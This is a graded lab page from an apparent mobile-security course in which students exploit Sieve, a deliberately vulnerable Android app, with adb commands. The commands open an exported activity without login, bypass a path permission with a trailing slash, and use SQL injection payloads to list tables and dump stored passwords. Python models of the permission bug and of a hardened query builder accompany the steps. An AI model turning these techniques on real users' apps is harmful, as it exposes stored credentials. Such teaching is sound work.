M 511: Exploiting a Vulnerable App (20 pts)

What You Need for This Project

Purpose

To practice exploiting various common app vulnerabilities.

Launch an Android Emulator

For most students, this will be the Android Studio emulator.

Installing Sieve

We'll use an intentionally vulnerable app.

On your host system, in a Web browser, go to

https://github.com/ReversecLabs/sieve/releases

Download sieve.apk. The app downloads.

Troubleshooting

If that download link fails, use this alternate download link:
sieve.apk

Drag the sieve.apk file and drop it on your running Android emulator.

Connecting to your Android Device with ADB

In a Terminal or Command Prompt, move to the platform-tools directory, as you did in a previous project, and execute this command:
./adb devices

You should see your emulator listed, as shown below.

Putting Passwords into Sieve

On your Android device, launch Sieve.

A "Welcome!" screen appears, as shown below.

Enter a password of Password12345678 in both fields and click Submit.

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit.

In the next page, enter a password of Password12345678 and click "Sign in".

On the next page, tap the ADD button, as shown below.

Enter some test data, as shown below, and click Save.

If a "Google Password Manager" screen pops up, click Never.

Don't put any real passwords into this app, of course, because they will be revealed later in the project.

Viewing the AndroidManifest.xml File

If you don't already have it running, launch Android Studio.

If you don't have it installed, get it from

https://developer.android.com/studio/

Drag the sieve.apk file and drop it on the center pane of Android Studio.

In the top section, click AndroidManifest.xml. Its contents appear in the lower pane, as shown below.

M 511.1: Permission (5 pts)

In the AndroidManifest.xml file, find the permission shown below.

The flag is covered by a green rectangle in the image below.

Viewing Activities

Look in the AndroidManifest.xml file, and find the first two Activities.

They are named MainLoginActivity and FileSelectActivity, and they are both exported, as shown below.

Scroll down to see the third exported activity, named PWList.

Exploiting a Published Activity

On your Android emulator, at the bottom, click the square icon, or drag up from the bottom of the screen.

This shows the running apps. Drag Sieve up and throw it away. This closes Sieve.

In your Terminal or Command Prompt, execute this command:

adb shell am start -n com.withsecure.example.sieve/.activity.PWList

The password list page opens on your emulator, without asking for a password first, as shown below.

This is an information disclosure exploit, exposing confidential information to a user who has not logged in.

Finding Content Providers

In Android Studio, find the content providers shown below: DBContentProvider and FileBackupProvider.

They are both exported.

Installing Java

Get Java from:

https://java.com

Installing JADX

Download JADX from:

https://sourceforge.net/projects/jadx.mirror/

It downloads as a ZIP file.

To unzip it:

In the unzipped folder, open the bin subfolder.

To launch the program:

Finding URIs

To exploit content providers, we need the URIs that point to their contents.

In JADX, click File, Open. Open the sieve.apk file.

Click the Search icon, outlined in green in the image below.

Search for content:// as shown below.

Three URIs are found.

Viewing Passwords

In your Terminal or Command Prompt, execute this command:
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords

The response contains a username and email address, but the password is an encrypted BLOB, as shown below.

Viewing Keys

In your Terminal or Command Prompt, execute this command:
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Keys

You see an error message, saying you don't have permission to see them, as shown below.

Understanding Path Permissions

In Android Studio, examine the permissions for DBContentProvider.

As shown below, the permissions are defined with this line:

android:path="/Keys"

In a Web browser, go to

https://developer.android.com/guide/topics/manifest/path-permission-element

The "path" permissions are explained, as shown below.

These permissions apply only if the URI path is exactly /Keys.
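The following Python model, an added example that is neither Sieve's code nor Android's, reimplements the three matching modes of the path-permission element (literal path, pathPrefix, pathPattern) and checks which URI paths Sieve's literal "/Keys" rule guards, next to a corrected pathPrefix rule; both rule lists are assumptions written for this example. Android's permission check compares the rule against Uri.getPath(), so a trailing slash changes the outcome even though the provider itself still routes the request to the same table.

```python
import re

# <path-permission> attribute -> Android PatternMatcher semantics (from the Android docs):
# android:path = literal (exact), android:pathPrefix = prefix, android:pathPattern = simple glob.
LITERAL, PREFIX, SIMPLE_GLOB = "path", "pathPrefix", "pathPattern"

def _glob_to_regex(pattern: str) -> str:
    """Android simple glob: '*' repeats the preceding char zero or more times,
    '.' matches any single char, '\\' escapes the next char."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\" and i + 1 < len(pattern):
            out.append(re.escape(pattern[i + 1]))
            i += 2
            continue
        if c == "*" and out:          # a leading '*' has nothing to repeat; ignore it
            out.append("*")
        elif c == ".":
            out.append(".")
        elif c != "*":
            out.append(re.escape(c))
        i += 1
    return "".join(out)

def path_matches(kind: str, pattern: str, uri_path: str) -> bool:
    """Does one <path-permission> element cover this Uri.getPath() value?"""
    if kind == LITERAL:
        return pattern == uri_path
    if kind == PREFIX:
        return uri_path.startswith(pattern)
    if kind == SIMPLE_GLOB:
        return re.fullmatch(_glob_to_regex(pattern), uri_path) is not None
    raise ValueError(f"unknown path-permission attribute: {kind}")

def is_read_protected(rules, uri_path: str) -> bool:
    """True when at least one rule guards the path, i.e. the read permission is enforced."""
    return any(path_matches(kind, pat, uri_path) for kind, pat in rules)

# Sieve's manifest as shown on this page: only the literal path "/Keys" is guarded.
SIEVE_RULES = [(LITERAL, "/Keys")]
# Corrected manifest (assumption, not Sieve's code): the prefix covers "/Keys/" and anything under it.
# A prefix also covers "/KeysBackup"; a pathPattern or a provider-level readPermission is tighter.
FIXED_RULES = [(PREFIX, "/Keys")]

if __name__ == "__main__":
    for p in ("/Keys", "/Keys/", "/Keys/1", "/keys"):
        print(f"{p:8} sieve={is_read_protected(SIEVE_RULES, p)!s:5} fixed={is_read_protected(FIXED_RULES, p)}")
```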

M 511.2: Viewing Keys/ (10 pts)

In your Terminal or Command Prompt, execute this command:
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/

You see the password, as shown below.

The flag is covered by a green rectangle in the image below.

Triggering a SQL Error

The content providers build SQLite queries from caller-supplied input, which makes them vulnerable to SQL injection.

In your Terminal or Command Prompt, execute these commands:

adb shell 

content query --uri \
content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords/ \
--projection "'"
If you see a "no closing quote" error, add a backslash before the apostrophe near the end of the command, as shown below. The reply shows "SQLiteException: unrecognized token", highlighted in the image below.

This error indicates a SQL injection vulnerability.

Enumerating Table Names

Execute this command to list the table names in the database:
content query \
--uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords \
--projection "* FROM SQLITE_MASTER WHERE type='table';--"

There are three tables, including Passwords and Key, as shown below.
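The stray quote and the table-enumeration projection above behave as they do because the provider splices the --projection value straight into its SELECT. This added Python model (not Sieve's code; the schema, rows and column allow-list are constructed for the example) puts that unvalidated query builder beside a hardened one that rejects anything outside a projection map, the same effect SQLiteQueryBuilder.setProjectionMap() with setStrict(true) gives an Android provider.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for Sieve's database (sample schema and rows, not the app's real data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords(service, username, password) VALUES ('demo', 'alice', X'DEADBEEF');
        INSERT INTO Key VALUES ('example-master-password', '0000');
    """)
    return db

def query_vulnerable(db, projection):
    """Splices caller-controlled column names straight into the SELECT: the pattern a
    provider exposes when it forwards --projection to the query builder unvalidated."""
    sql = f"SELECT {', '.join(projection)} FROM Passwords"
    return db.execute(sql).fetchall()

ALLOWED_COLUMNS = {"_id", "service", "username", "password"}   # the provider's projection map

def query_hardened(db, projection):
    """Allow-list every requested column before any SQL is built; on Android the same
    effect comes from SQLiteQueryBuilder.setProjectionMap() together with setStrict(true)."""
    bad = [c for c in projection if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError(f"rejected projection column(s): {bad}")
    sql = f"SELECT {', '.join(projection)} FROM Passwords"
    return db.execute(sql).fetchall()

def probe(db, projection):
    """Run the vulnerable query and return its rows, or the SQLite error text that
    `content query` surfaces as an SQLiteException."""
    try:
        return query_vulnerable(db, projection)
    except sqlite3.OperationalError as e:
        return str(e)

# The two inputs used on this page: a lone quote, and the table-enumeration payload.
QUOTE_PROBE = ["'"]
ENUMERATE_TABLES = ["* FROM SQLITE_MASTER WHERE type='table';--"]

if __name__ == "__main__":
    db = make_db()
    print(probe(db, QUOTE_PROBE))                             # unrecognized token: the injection signal
    print([row[1] for row in probe(db, ENUMERATE_TABLES)])    # table names leak from sqlite_master
    try:
        query_hardened(db, ENUMERATE_TABLES)
    except ValueError as e:
        print(e)                                              # the hardened provider refuses it
```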

M 511.3: Viewing Passwords (5 pts)

In your Terminal or Command Prompt, execute this command:
content query \
--uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords \
--projection "* FROM Passwords;--"

You see the password, as shown below.

The flag is covered by a green rectangle in the image below.

Sources

Drozer
drozer user guide

Posted 10-3-22, updated 5:52 pm
Extensively updated and video added 10-15-25